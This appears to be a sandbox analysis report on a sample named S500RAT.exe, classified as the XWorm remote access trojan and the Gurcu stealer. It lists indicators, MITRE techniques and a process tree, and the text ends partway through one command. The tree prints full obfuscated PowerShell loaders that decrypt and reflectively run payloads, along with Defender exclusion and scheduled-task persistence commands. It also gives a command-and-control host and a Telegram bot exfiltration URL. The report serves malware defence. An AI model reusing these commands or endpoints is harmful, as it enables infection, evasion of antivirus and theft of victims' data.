gurcu | fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7

Analysis

max time kernel
147s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02-08-2024 14:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

S500RAT.exe
Size

19.2MB
MD5

aa4bb4c57074e543076b145b7399cd64
SHA1

5e36e64cc686fa553b43d1c274d1a15e18b50501
SHA256

fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7
SHA512

ff38fc85d51fda9d32668949d2f67074be1e52cb6d63978155347173452199687935b9e96d3a060c7ab74461c5f4228b2c4cf8a0486ca5bbd9ea962a1c16c5eb
SSDEEP

393216:0W7LVQgX47mXZGbWVQjFLICQA122lrL8jiQIthY4eqfIgUJzM8/bX9Wwy:NBfXZGbBjFLICB1hUji1tWbZT9W/

Score

10^/10

gurcu xworm evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

floor-talked.gl.at.ply.gg:52348

Attributes

Install_directory
%AppData%
install_file
processor.exe
telegram
https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Extracted

Family

gurcu

https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/memory/1532-237-0x000001904F0A0000-0x000001904F0B6000-memory.dmp	family_xworm
behavioral2/memory/2200-322-0x0000020D70430000-0x0000020D70446000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 13 IoCs

flow	pid	Process
2	1804	powershell.exe
4	1532	powershell.exe
6	1532	powershell.exe
7	1804	powershell.exe
8	1804	powershell.exe
9	1532	powershell.exe
10	1804	powershell.exe
13	1532	powershell.exe
14	1804	powershell.exe
15	1532	powershell.exe
16	1804	powershell.exe
17	1532	powershell.exe
18	1804	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 24 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3716	powershell.exe
2200	powershell.exe
4936	powershell.exe
1256	powershell.exe
5092	powershell.exe
3624	powershell.exe
1512	powershell.exe
324	powershell.exe
3836	powershell.exe
1540	powershell.exe
1804	powershell.exe
2732	powershell.exe
1532	powershell.exe
336	powershell.exe
3552	powershell.exe
464	powershell.exe
3832	powershell.exe
4460	powershell.exe
3616	powershell.exe
3124	powershell.exe
1996	powershell.exe
3716	powershell.exe
5108	powershell.exe
1788	powershell.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1396	attrib.exe
3492	attrib.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2492	system.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\system\\system.exe\""	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1988	timeout.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	system.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	system.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	system.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1532	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3616	powershell.exe
3616	powershell.exe
3124	powershell.exe
3124	powershell.exe
1996	powershell.exe
1996	powershell.exe
3716	powershell.exe
3716	powershell.exe
4936	powershell.exe
4936	powershell.exe
3836	powershell.exe
3836	powershell.exe
1540	powershell.exe
5108	powershell.exe
5108	powershell.exe
1540	powershell.exe
3832	powershell.exe
3832	powershell.exe
1788	powershell.exe
1788	powershell.exe
5092	powershell.exe
5092	powershell.exe
3624	powershell.exe
3624	powershell.exe
1512	powershell.exe
1512	powershell.exe
4460	powershell.exe
4460	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
1532	powershell.exe
1532	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
1256	powershell.exe
1256	powershell.exe
464	powershell.exe
464	powershell.exe
336	powershell.exe
336	powershell.exe
3552	powershell.exe
3552	powershell.exe
3716	powershell.exe
3716	powershell.exe
324	powershell.exe
324	powershell.exe
324	powershell.exe
1804	powershell.exe
1804	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeIncreaseQuotaPrivilege	1540	powershell.exe
Token: SeSecurityPrivilege	1540	powershell.exe
Token: SeTakeOwnershipPrivilege	1540	powershell.exe
Token: SeLoadDriverPrivilege	1540	powershell.exe
Token: SeSystemProfilePrivilege	1540	powershell.exe
Token: SeSystemtimePrivilege	1540	powershell.exe
Token: SeProfSingleProcessPrivilege	1540	powershell.exe
Token: SeIncBasePriorityPrivilege	1540	powershell.exe
Token: SeCreatePagefilePrivilege	1540	powershell.exe
Token: SeBackupPrivilege	1540	powershell.exe
Token: SeRestorePrivilege	1540	powershell.exe
Token: SeShutdownPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeSystemEnvironmentPrivilege	1540	powershell.exe
Token: SeRemoteShutdownPrivilege	1540	powershell.exe
Token: SeUndockPrivilege	1540	powershell.exe
Token: SeManageVolumePrivilege	1540	powershell.exe
Token: 33	1540	powershell.exe
Token: 34	1540	powershell.exe
Token: 35	1540	powershell.exe
Token: 36	1540	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeIncreaseQuotaPrivilege	1540	powershell.exe
Token: SeSecurityPrivilege	1540	powershell.exe
Token: SeTakeOwnershipPrivilege	1540	powershell.exe
Token: SeLoadDriverPrivilege	1540	powershell.exe
Token: SeSystemProfilePrivilege	1540	powershell.exe
Token: SeSystemtimePrivilege	1540	powershell.exe
Token: SeProfSingleProcessPrivilege	1540	powershell.exe
Token: SeIncBasePriorityPrivilege	1540	powershell.exe
Token: SeCreatePagefilePrivilege	1540	powershell.exe
Token: SeBackupPrivilege	1540	powershell.exe
Token: SeRestorePrivilege	1540	powershell.exe
Token: SeShutdownPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeSystemEnvironmentPrivilege	1540	powershell.exe
Token: SeRemoteShutdownPrivilege	1540	powershell.exe
Token: SeUndockPrivilege	1540	powershell.exe
Token: SeManageVolumePrivilege	1540	powershell.exe
Token: 33	1540	powershell.exe
Token: 34	1540	powershell.exe
Token: 35	1540	powershell.exe
Token: 36	1540	powershell.exe
Token: SeIncreaseQuotaPrivilege	1540	powershell.exe
Token: SeSecurityPrivilege	1540	powershell.exe
Token: SeTakeOwnershipPrivilege	1540	powershell.exe
Token: SeLoadDriverPrivilege	1540	powershell.exe
Token: SeSystemProfilePrivilege	1540	powershell.exe
Token: SeSystemtimePrivilege	1540	powershell.exe
Token: SeProfSingleProcessPrivilege	1540	powershell.exe
Token: SeIncBasePriorityPrivilege	1540	powershell.exe
Token: SeCreatePagefilePrivilege	1540	powershell.exe
Token: SeBackupPrivilege	1540	powershell.exe
Token: SeRestorePrivilege	1540	powershell.exe
Token: SeShutdownPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1532	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2704 wrote to memory of 808	2704	S500RAT.exe	79
PID 2704 wrote to memory of 808	2704	S500RAT.exe	79
PID 2704 wrote to memory of 3616	2704	S500RAT.exe	80
PID 2704 wrote to memory of 3616	2704	S500RAT.exe	80
PID 2704 wrote to memory of 2576	2704	S500RAT.exe	82
PID 2704 wrote to memory of 2576	2704	S500RAT.exe	82
PID 2704 wrote to memory of 3124	2704	S500RAT.exe	84
PID 2704 wrote to memory of 3124	2704	S500RAT.exe	84
PID 2704 wrote to memory of 3680	2704	S500RAT.exe	86
PID 2704 wrote to memory of 3680	2704	S500RAT.exe	86
PID 808 wrote to memory of 5072	808	S500RAT.exe	88
PID 808 wrote to memory of 5072	808	S500RAT.exe	88
PID 808 wrote to memory of 1996	808	S500RAT.exe	89
PID 808 wrote to memory of 1996	808	S500RAT.exe	89
PID 808 wrote to memory of 1040	808	S500RAT.exe	91
PID 808 wrote to memory of 1040	808	S500RAT.exe	91
PID 808 wrote to memory of 3716	808	S500RAT.exe	93
PID 808 wrote to memory of 3716	808	S500RAT.exe	93
PID 2576 wrote to memory of 4936	2576	cmd.exe	95
PID 2576 wrote to memory of 4936	2576	cmd.exe	95
PID 808 wrote to memory of 2724	808	S500RAT.exe	96
PID 808 wrote to memory of 2724	808	S500RAT.exe	96
PID 3680 wrote to memory of 3836	3680	cmd.exe	99
PID 3680 wrote to memory of 3836	3680	cmd.exe	99
PID 4936 wrote to memory of 1540	4936	powershell.exe	100
PID 4936 wrote to memory of 1540	4936	powershell.exe	100
PID 5072 wrote to memory of 3444	5072	S500RAT.exe	102
PID 5072 wrote to memory of 3444	5072	S500RAT.exe	102
PID 5072 wrote to memory of 5108	5072	S500RAT.exe	103
PID 5072 wrote to memory of 5108	5072	S500RAT.exe	103
PID 3836 wrote to memory of 3832	3836	powershell.exe	105
PID 3836 wrote to memory of 3832	3836	powershell.exe	105
PID 4936 wrote to memory of 2344	4936	powershell.exe	107
PID 4936 wrote to memory of 2344	4936	powershell.exe	107
PID 2344 wrote to memory of 1036	2344	WScript.exe	108
PID 2344 wrote to memory of 1036	2344	WScript.exe	108
PID 3836 wrote to memory of 1032	3836	powershell.exe	110
PID 3836 wrote to memory of 1032	3836	powershell.exe	110
PID 5072 wrote to memory of 3996	5072	S500RAT.exe	111
PID 5072 wrote to memory of 3996	5072	S500RAT.exe	111
PID 5072 wrote to memory of 1788	5072	S500RAT.exe	113
PID 5072 wrote to memory of 1788	5072	S500RAT.exe	113
PID 1032 wrote to memory of 3936	1032	WScript.exe	115
PID 1032 wrote to memory of 3936	1032	WScript.exe	115
PID 1040 wrote to memory of 5092	1040	cmd.exe	117
PID 1040 wrote to memory of 5092	1040	cmd.exe	117
PID 5072 wrote to memory of 3568	5072	S500RAT.exe	118
PID 5072 wrote to memory of 3568	5072	S500RAT.exe	118
PID 5092 wrote to memory of 3624	5092	powershell.exe	120
PID 5092 wrote to memory of 3624	5092	powershell.exe	120
PID 5092 wrote to memory of 3212	5092	powershell.exe	122
PID 5092 wrote to memory of 3212	5092	powershell.exe	122
PID 3212 wrote to memory of 808	3212	WScript.exe	123
PID 3212 wrote to memory of 808	3212	WScript.exe	123
PID 2724 wrote to memory of 1512	2724	cmd.exe	125
PID 2724 wrote to memory of 1512	2724	cmd.exe	125
PID 1512 wrote to memory of 4460	1512	powershell.exe	126
PID 1512 wrote to memory of 4460	1512	powershell.exe	126
PID 3936 wrote to memory of 3552	3936	cmd.exe	128
PID 3936 wrote to memory of 3552	3936	cmd.exe	128
PID 1512 wrote to memory of 3476	1512	powershell.exe	129
PID 1512 wrote to memory of 3476	1512	powershell.exe	129
PID 3476 wrote to memory of 1088	3476	WScript.exe	130
PID 3476 wrote to memory of 1088	3476	WScript.exe	130

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1396	attrib.exe
3492	attrib.exe

C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
  "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:808
- - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
    "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
      "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
      4⤵
      PID:3444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
      4⤵
      PID:3996
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1256
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_91_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_91.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:336
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_91.vbs"
        6⤵
        Checks computer location settings
        
        PID:1620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_91.bat" "
        7⤵
        
        PID:4040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_91.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
      4⤵
      PID:3568
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object 